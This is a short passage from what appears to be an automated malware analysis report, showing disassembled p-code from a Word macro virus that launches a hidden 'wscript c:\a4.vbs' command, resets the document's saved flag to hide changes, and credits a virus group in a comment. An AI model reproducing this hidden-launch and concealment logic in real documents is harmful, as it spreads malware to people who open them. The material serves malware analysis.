' EndIfBlock
' Line #128:
' LitStr 0x0011 "wscript c:\a4.vbs"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #129:
' EndIfBlock
' Line #130:
' Ld ActiveDocument
' MemLd Saved
' Ld a
' Ne
' If
' BoSImplicit
' Ld a
' Ld ActiveDocument
' MemSt Saved
' EndIf
' Line #131:
' QuoteRem 0x0000 0x005B " Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia"
' Line #132:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.